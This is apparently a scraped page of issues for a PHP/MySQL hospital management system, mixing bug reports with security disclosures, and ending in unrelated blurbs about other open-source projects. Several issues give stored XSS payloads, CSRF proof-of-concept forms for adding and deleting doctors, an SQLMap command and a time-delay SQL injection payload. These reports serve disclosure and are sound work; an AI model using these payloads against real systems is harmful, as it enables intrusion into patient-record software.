kishan0725 / hospital-management-system Goto Github PK
View Code? Open in Web Editor NEWHospital Management System using php and mysql
Hospital Management System using php and mysql
I have tried to login using the provided admin login credentials but I am get an error stating wrong username or password. Kindly assist
registration process permit registration of patients with same identity i.e Names, email and phone number
a lot of pages use hardcoded values for mysql connection
Persistent cross-site scripting (XSS) in Hospital Management System v4.0 targeted towards web admin through /admin-panel1.php at via the parameter demail.
Add Doctor info payload to Doctor Name of Add Doctor page to target /admin-panel1.php ,then use burpsuite get requests datas,change the 'demail' parameter to xss payload: <sCrIpT>alert(5555)</ScRiPt>
Proof of concept (Poc)
<sCrIpT>alert(5555)</ScRiPt>Please contact me to resolve this issue. I am not going to publish the exploit code here.
Hi,
There is a site-wide CSRF vulnerability in every functionality.
Add Doctor
<html>
<body>
<form action="http://49f9541dc2b3.ngrok.io/admin-panel1.php" method="POST">
<input type="hidden" name="doctor" value="test" />
<input type="hidden" name="special" value="Cardiologist" />
<input type="hidden" name="demail" value="test@gmail.com" />
<input type="hidden" name="dpassword" value="testtest" />
<input type="hidden" name="cdpassword" value="testtest" />
<input type="hidden" name="docFees" value="123" />
<input type="hidden" name="docsub" value="Add Doctor" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
Delete Doctor
<html>
<body>
<form action="http://localhost/admin-panel1.php" method="POST">
<input type="hidden" name="demail" value="testbydhakalananda@gmail.com" />
<input type="hidden" name="docsub1" value="Delete Doctor" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
Add Doctor info payload to Doctor Special of Add Doctor page to target /admin-panel1.php, then use burpsuite get requests datas, change the 'special' parameter to xss payload: <script>alert(123)</script>
Step to exploit:
Proof of concept (Poc):
<script>alert(123)</script>Hi there,
I couldn't find a SECURITY.md
in your repository and am not sure how to best contact you privately to disclose a security issue.
Can you add a SECURITY.md
file with an e-mail to your repository, so that our system can send you the vulnerability details? GitHub suggests that a security policy is the best way to make sure security issues are responsibly disclosed.
Once you've done that, you should receive an e-mail within the next hour with more info.
Thanks! (cc @huntr-helper)
appointment not create
Appointment status in doctor panel should change from "active" to "completed" either after the prescription is given or after the bill is paid by the patient.
The completed appointment should be removed from the doctor panel after the bill is paid.
When we register new patient and redirect to admin panel then we can't book appointments.
Add Doctor info payload to Doctor Name of Add Doctor page to target /admin-panel1.php ,then use burpsuite get requests datas,change the 'dpassword' parameter to xss payload: <sCrIpT>alert(7777)</ScRiPt>
Steps to exploit:
Navigate to http://hospital.com/admin-panel1.php
click 'Add Doctors ', use burpsuite to insert xss payload in the "dpassword" parameter
Click "Add Doctors"
Proof of concept (Poc):
<sCrIpT>alert(7777)</ScRiPt>When doctor prescribes new patient, patient's name, id and appointment id is not showing the prescription list. It seems there is some bug in this application.
please help me
Add Doctor info payload to Doctor Name of Add Doctor page to target /admin-panel1.php ,then use burpsuite get requests datas,change the 'doctor' parameter to xss payload: <sCrIpT>alert(1234)</ScRiPt>
Add Doctor info payload to Doctor Name of Add Doctor page to target /admin-panel1.php ,then use burpsuite get requests datas,change the 'doctor' parameter to xss payload: <sCrIpT>alert(1234)</ScRiPt>
I found an SQL Injection in your project
Pls Follow these steps to reproduce:
1:In admin panel use feature search doctor:
2: Create a request to 'doctorsearch.php':
3: Save this request to test.txt file:
4: Run SQLMap for the attack:
sqlmap -r test.txt -p doctor_contact
-> Injected
5: Area of concern in doctorsearch.php ( line 11 -> line 17 )
Multiple SQL injections and a XSS vulnerability in Hospital-Management-System v4
A Resuming Table of the Discovered Vulnerabilities:
To reproduce the XSS vulnerability a <script>alert(1)</script> would work. And for the SQL injections, time delay payloads work (such as '+(select*from(select(sleep(20)))a)+')
Hello @kishan0725
Can I contribute to this project by adding new feature to the current project like:
Adding a medicine buying module
Adding payment module
Creating a web interface for the same
would it be fine if I work on it?
add docker support
A declarative, efficient, and flexible JavaScript library for building user interfaces.
🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
An Open Source Machine Learning Framework for Everyone
The Web framework for perfectionists with deadlines.
A PHP framework for web artisans
Bring data to life with SVG, Canvas and HTML. 📊📈🎉
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
Some thing interesting about web. New door for the world.
A server is a program made to process requests and deliver data to clients.
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
Some thing interesting about visualization, use data art
Some thing interesting about game, make everyone happy.
We are working to build community through open source technology. NB: members must have two-factor auth.
Open source projects and samples from Microsoft.
Google ❤️ Open Source for everyone.
Alibaba Open Source for everyone
Data-Driven Documents codes.
China tencent open source team.